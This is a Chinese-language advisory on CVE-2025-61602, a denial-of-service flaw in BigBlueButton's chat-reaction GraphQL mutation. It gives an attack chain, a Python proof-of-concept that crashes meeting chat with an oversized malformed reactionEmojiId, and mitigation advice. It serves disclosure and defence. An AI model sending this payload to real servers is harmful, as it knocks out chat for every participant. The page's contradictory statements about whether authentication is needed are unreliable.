CVE-2025-61602 BigBlueButton GraphQL拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61602

漏洞类型

拒绝服务攻击（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BigBlueButton

漏洞概述

CVE-2025-61602是BigBlueButton开源虚拟课堂平台中的一个高危拒绝服务（DoS）漏洞。该漏洞存在于3.0.13之前的所有版本中，允许任何经过身份验证的用户通过在GraphQL变更操作`chatSendMessageReaction`中发送格式错误的`reactionEmojiId`参数，使整个会议中所有参与者的聊天功能崩溃。BigBlueButton作为一款广泛使用的在线教学和视频会议软件，被全球众多教育机构、企业和组织用于远程教学和协作。该漏洞的CVSS 3.1评分为7.5，属于高危级别，其攻击向量为网络（AV:N），无需特殊权限（PR:N），也无需用户交互（UI:N），对系统可用性产生高影响（A:H）。由于该漏洞利用门槛极低，任何已登录用户均可发起攻击，可能导致正在进行的在线课程或会议中所有用户的聊天功能完全不可用，严重影响在线教学的正常进行和用户体验。该漏洞已在3.0.13版本中通过补丁修复，官方建议用户尽快升级到最新版本以消除安全隐患。

技术细节

该漏洞的技术根源在于BigBlueButton的GraphQL API中`chatSendMessageReaction`变更操作对`reactionEmojiId`参数缺乏充分的输入验证。当用户通过GraphQL端点发送聊天消息表情反应时，服务器端未对`reactionEmojiId`字段进行严格的格式校验和边界检查。攻击者可以构造包含畸形或恶意数据的`reactionEmojiId`值（例如包含特殊字符、超长字符串、SQL注入片段或非预期的数据类型），当服务器尝试解析或处理该异常值时，会触发未处理的异常或资源耗尽，从而导致聊天服务进程崩溃。由于该服务通常以单实例方式运行整个会议的聊天功能，一旦崩溃将影响该会议中的所有参与者。攻击者只需拥有一个有效的BigBlueButton账户和会议访问权限，即可通过简单的GraphQL请求触发该漏洞，无需复杂的攻击工具或高级技术能力。修复方案是在服务器端对`reactionEmojiId`实施严格的输入验证，确保其符合预期的格式规范（如预定义的表情符号ID枚举值或合法Unicode字符范围），并在异常处理中增加防御性编程以防止服务中断。

攻击链分析

STEP 1

步骤1：获取有效凭证

攻击者通过正常注册流程获得BigBlueButton平台的合法账户，并加入目标会议房间以获取有效的认证Token。

STEP 2

步骤2：识别GraphQL端点

攻击者通过浏览器开发者工具或网络抓包分析，定位BigBlueButton服务器的GraphQL API端点（通常为/graphql），并了解chatSendMessageReaction变更操作的参数结构。

STEP 3

步骤3：构造畸形Payload

攻击者构造包含畸形reactionEmojiId参数的GraphQL请求，该参数包含超长字符串、特殊字符或非预期数据格式，用于触发服务器端的解析异常。

STEP 4

步骤4：发送恶意请求

攻击者使用合法认证凭证通过HTTP POST请求将构造好的GraphQL变更发送到服务器端，触发未处理的异常。

STEP 5

步骤5：聊天服务崩溃

服务器在处理畸形reactionEmojiId时发生未捕获异常，导致聊天服务进程终止，整个会议中所有参与者的聊天功能不可用，影响在线教学的正常进行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61602 PoC - BigBlueButton GraphQL DoS via malformed reactionEmojiId
# Vulnerability: Unauthenticated (within authenticated session) DoS in chatSendMessageReaction

import requests
import json

# Configuration
BBB_SERVER = "https://your-bigbluebutton-server.com"
MEETING_ID = "your-meeting-id"
AUTH_TOKEN = "your-auth-token"  # Valid authenticated session token

# GraphQL endpoint (typical BigBlueButton haskell-server endpoint)
GRAPHQL_URL = f"{BBB_SERVER}/graphql"

def trigger_dos():
    """
    Send a malformed reactionEmojiId to crash the chat functionality
    for all participants in the meeting.
    """
    # Malformed payload - the reactionEmojiId contains invalid/oversized data
    # that triggers an unhandled exception in the server-side parser
    payload = {
        "query": """
        mutation SendReaction($chatMessageId: String!, $reactionEmojiId: String!) {
            chatSendMessageReaction(
                chatMessageId: $chatMessageId,
                reactionEmojiId: $reactionEmojiId
            ) {
                reactionEmojiId
                chatMessageId
            }
        }
        """,
        "variables": {
            "chatMessageId": "valid-chat-message-id",
            # Malformed reactionEmojiId - triggers the vulnerability
            "reactionEmojiId": "A" * 10000 + "\x00\xff\xfe" + "{{invalid}}"
        }
    }

    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {AUTH_TOKEN}"
    }

    try:
        response = requests.post(
            GRAPHQL_URL,
            headers=headers,
            data=json.dumps(payload),
            timeout=10
        )
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text[:500]}")
    except Exception as e:
        print(f"Request failed (expected if server crashed): {e}")

if __name__ == "__main__":
    trigger_dos()

影响范围

BigBlueButton < 3.0.13

防御指南

临时缓解措施

在官方补丁发布前，建议管理员通过Web应用防火墙（WAF）或反向代理对GraphQL端点的chatSendMessageReaction操作进行请求过滤，限制reactionEmojiId参数的长度和字符集；同时密切监控聊天服务的运行状态，配置进程自动重启机制以减少服务中断时间；限制普通用户的GraphQL API访问权限，仅授予必要的最小权限。